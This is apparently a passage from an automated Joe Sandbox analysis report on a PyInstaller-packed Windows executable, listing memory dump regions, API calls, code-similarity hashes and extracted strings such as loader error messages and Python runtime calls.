                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                      • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                      • API String ID: 3975851968-2863640275
                                                                                                                                                                                                      • Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                      • Instruction ID: a689ae1f0651379f4a7ca02aaceeab5828097c6693eed5471cac9fc214f9df41
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E221B725B09AC282E7416B7AA8441B9E751FF88B91FD84331DE3D473E4DE2CD5A1C3A1
APIs
Memory Dump Source
• Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
• Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
Similarity
• API ID: Name::operator+
• String ID:
• API String ID: 2943138195-0
• Opcode ID: 59ff93c280199e5836e6df8be1a97549f355a4d451030ffe8799044faf8f3d85
• Instruction ID: d1fba7c03b36b6a917fe2a2cece46f6af12a626b519ee927bc23183e2bfef55c
• Opcode Fuzzy Hash: 59ff93c280199e5836e6df8be1a97549f355a4d451030ffe8799044faf8f3d85
• Instruction Fuzzy Hash: D5715BF6B04A429AEB10DF78D4991EC33B1AB0478CB814435DF0D57A89EF38D61AC798

APIs
Memory Dump Source
• Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
• Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
Similarity
• API ID: Mem_$memcpy$Bytes_DeallocErr_FreeFromMallocNoneReallocSizeStringmemmove
• String ID:
• API String ID: 1220578264-0
• Opcode ID: 2ce1e75fb51f9a3f206443671645bee960fc5d54ef179fc2ab26c157188d4aa1
• Instruction ID: a0fc774510eabffd18e7a0a48d5763ceb5a8752a4fcae13697d1afb4adcdbd7e
• Opcode Fuzzy Hash: 2ce1e75fb51f9a3f206443671645bee960fc5d54ef179fc2ab26c157188d4aa1
• Instruction Fuzzy Hash: B65119A2A09A4285EF64CF3AE980239B2A5FF54F94F549131CF4F17764DF38E8918308

Strings
Memory Dump Source
• Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
• Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
Similarity
• API ID:
• String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
• API String ID: 0-3207858774
• Opcode ID: 6ea09e53c78372fd51fc6217c56ea2e3ac166cdbb3b457d9f2a8c27783302216
• Instruction ID: ad124b6483269d1734449237d20bbd1c0ed6f8064a8ca74404ee7aaaa5a29c77
• Opcode Fuzzy Hash: 6ea09e53c78372fd51fc6217c56ea2e3ac166cdbb3b457d9f2a8c27783302216
• Instruction Fuzzy Hash: 50819CEAB08A8689FB10DF39D4982BC73A1AB54B88F445136DB4D03795DF3CE946C358

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
• Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
Similarity
• API ID: Name::operator+
• String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
• API String ID: 2943138195-1464470183
• Opcode ID: af40fed7b60034fd5c5e0a5ae54bcf9e4d80c7769b22b13ab88bd66fa3393346
• Instruction ID: 63f0bb7e195d0441c3e1cfdddb9aba016caa5506520b299fe1de33bcc029e535
• Opcode Fuzzy Hash: af40fed7b60034fd5c5e0a5ae54bcf9e4d80c7769b22b13ab88bd66fa3393346
• Instruction Fuzzy Hash: 7D5149FAF18A1289FB10CB79E8886BC37B5BB14344F540135DB1E56A99DF39E505C708

APIs
Memory Dump Source
• Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
• Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: 70915207e7be9065a407a64c40093981d4266dbe3b87672567642ae960650288
• Instruction ID: b9d31e98466a28afc4ba4fdd12a1f3028916c414d2720dc52a7174d3e28b8a74
• Opcode Fuzzy Hash: 70915207e7be9065a407a64c40093981d4266dbe3b87672567642ae960650288
• Instruction Fuzzy Hash: B38149A3E0860386FA54AB7DDC8527DA690BF46780F54C035DB4ED36B6DE2CEC45E608

APIs
Memory Dump Source
• Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
• Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: 304648fe44af0b0642874aeeb3fd5233e45cc95158f24f653d2d0f5b48aa927d
• Instruction ID: 72ba158f4d19dc39e2391dcfeb31c0bd59cc05245f4ba1a9bf87dbf3ea5c6db4
• Opcode Fuzzy Hash: 304648fe44af0b0642874aeeb3fd5233e45cc95158f24f653d2d0f5b48aa927d
• Instruction Fuzzy Hash: BA8166E1E08643A6FA149B3DDC41279F6A4BF45B80F44E434EB0F563B6DE2CEC458608

APIs
Memory Dump Source
• Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
• Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
Similarity
• API ID: Mem_memcpy$Bytes_DeallocFromMallocReallocSizeString
• String ID:
• API String ID: 2377850682-0
• Opcode ID: 899608a81334ef61ac34276615ae4fc4249bfbbc58ed4a6ca9e48d25f1f2f9ab
• Instruction ID: c4741342383522ed4c3c7b5b42ce3c38f8f881b99ac2e6f99828b2bbf3c7c249
• Opcode Fuzzy Hash: 899608a81334ef61ac34276615ae4fc4249bfbbc58ed4a6ca9e48d25f1f2f9ab
• Instruction Fuzzy Hash: CB5128B3A09B8281EB108F3EE944279A2A4BB05B84F18C435CF8E57765DF3CE855D308

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID: -$:$f$p$p
                                                                                                                                                                                                      • API String ID: 3215553584-2013873522
                                                                                                                                                                                                      • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                      • Instruction ID: 1f306e519a96028b74d20d62fd11342280a941ce0d22d7ee19ee4a040a80e00d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 58126D62A0C1C386FB38BB14D1546F9B695FB41750FD44235E6BA47AC4DF3CE9888BA0
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID: f$f$p$p$f
                                                                                                                                                                                                      • API String ID: 3215553584-1325933183
                                                                                                                                                                                                      • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                      • Instruction ID: ee94746ab76c09dc172229fd4a4af167e040987f4deffd1534f6486bc1e4e9cf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03125022E0C1E386FF38BA15E0546F9E661EB40754FD84235E6B947AC4DF7CE4808BA4
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                                                      • API String ID: 211107550-393685449
                                                                                                                                                                                                      • Opcode ID: 579c448420c1f2a36cb32246af93653fbc5f1fd4bf1dbfa0e8ef84cdd48a3a2d
                                                                                                                                                                                                      • Instruction ID: 822b0c57b736286d2bd82037ecea00fd45b03184d4a9931a90d646792aab17dd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 579c448420c1f2a36cb32246af93653fbc5f1fd4bf1dbfa0e8ef84cdd48a3a2d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 63E1C0F6B086828AE710DF78D4883AD7BA1FB44B59F104235DB8D57666DF38E481C704
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                      • API String ID: 2050909247-3659356012
                                                                                                                                                                                                      • Opcode ID: 1c2171175d3d913f9d049cd0caef72b4136420d7d17f701daae5e244edb4a223
                                                                                                                                                                                                      • Instruction ID: 130b96ae9817b0e558ee9e765f441cb743f971aefdf0deaf4aa8a81fee3a9b7f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c2171175d3d913f9d049cd0caef72b4136420d7d17f701daae5e244edb4a223
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80415721A0869286EB14FB12A8406FAE794BF45B84FC44632ED7D077D6DE3CE546C7E0
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __acrt_iob_func
                                                                                                                                                                                                      • String ID: %d work, %d block, ratio %5.2f$ too repetitive; using fallback sorting algorithm$VUUU
                                                                                                                                                                                                      • API String ID: 711238415-2988393112
                                                                                                                                                                                                      • Opcode ID: 18a46e59b38c0ffc594a90cb27ab0c0b365cb8b5e384a93f1effe7021e4673d3
                                                                                                                                                                                                      • Instruction ID: 172fc190bae116d0adfaac929023684d3d8cb31e1b0c896d71f2877a2c2693e7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18a46e59b38c0ffc594a90cb27ab0c0b365cb8b5e384a93f1effe7021e4673d3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F418CB3A0864287E6149B3DD845168B7A5FB98B94F108236DF0F537A5DF39EC82C604
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetTempPathW.KERNEL32(?,?,00000000,00007FF7FF583CBB), ref: 00007FF7FF5888F4
                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00007FF7FF583CBB), ref: 00007FF7FF5888FA
                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00007FF7FF583CBB), ref: 00007FF7FF58893C
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF588A20: GetEnvironmentVariableW.KERNEL32(00007FF7FF58388E), ref: 00007FF7FF588A57
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF588A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7FF588A79
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF5982A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FF5982C1
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF582810: MessageBoxW.USER32 ref: 00007FF7FF5828EA
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                      • API String ID: 3563477958-1339014028
                                                                                                                                                                                                      • Opcode ID: 3a70bda7ffd5e2f24f75b68c8ad2fcede7245b413113c53eacf20ccce7bf2460
                                                                                                                                                                                                      • Instruction ID: 86979438d1f6213863f5b2f138208d8bac97bee4d79f3f3289ff0c5bc3daa82e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3a70bda7ffd5e2f24f75b68c8ad2fcede7245b413113c53eacf20ccce7bf2460
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A419D12A096C340EB24BB25A8552F99291FF89B85FC04331ED3D4B7D6EE3CE501C6E0
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
• Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                      • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                                                                                                                                                                      • API String ID: 2943138195-2239912363
                                                                                                                                                                                                      • Opcode ID: b834bdc2b4e624d8bfe4a0aa6ffd56aa1f04fb76a255bf56b0e6c1b80a1fdf25
                                                                                                                                                                                                      • Instruction ID: 05c814bda7afa221866c2f831e1588742aa47fd08df3f68c8d4a460a83be77ff
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b834bdc2b4e624d8bfe4a0aa6ffd56aa1f04fb76a255bf56b0e6c1b80a1fdf25
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B512BEAF18B91A9FB11CB78D8492BD37B0BB18744F444236CB4D22A95DF3CA585C718
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                                                      • API String ID: 849930591-393685449
                                                                                                                                                                                                      • Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                      • Instruction ID: c0b18e7f5c9e2c966aeb331c1505eb08ddfd7a0d8cbffe6cc55aafa00969d228
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0AD17C32A0879187EB20ABA5D4403EDB7B0FB45798F900235EA6D57BD6DF38E484C790
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7FF583706,?,00007FF7FF583804), ref: 00007FF7FF582C9E
                                                                                                                                                                                                      • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7FF583706,?,00007FF7FF583804), ref: 00007FF7FF582D63
                                                                                                                                                                                                      • MessageBoxW.USER32 ref: 00007FF7FF582D99
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                      • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                      • API String ID: 3940978338-251083826
                                                                                                                                                                                                      • Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                      • Instruction ID: 652bea952ee70fcb8e0ddebb2e345548fb152ccc6124e73bdbcaf7afb49e76ea
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3031F822708A8152E720BB25B8146EBAA91BF847C8F800235EF6D937D9DF3CD516C390
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyBytes_FromStringAndSize.PYTHON313(?,?,?,?,?,?,?,00000000,?,?,?,00007FFBBB608041), ref: 00007FFBBB611EF1
                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?,?,?,00007FFBBB608041), ref: 00007FFBBB611F35
                                                                                                                                                                                                      • _Py_Dealloc.PYTHON313(?,?,?,?,?,?,?,00000000,?,?,?,00007FFBBB608041), ref: 00007FFBBB611F51
                                                                                                                                                                                                      • _Py_Dealloc.PYTHON313(?,?,?,?,?,?,?,00000000,?,?,?,00007FFBBB608041), ref: 00007FFBBB611F98
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
• Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
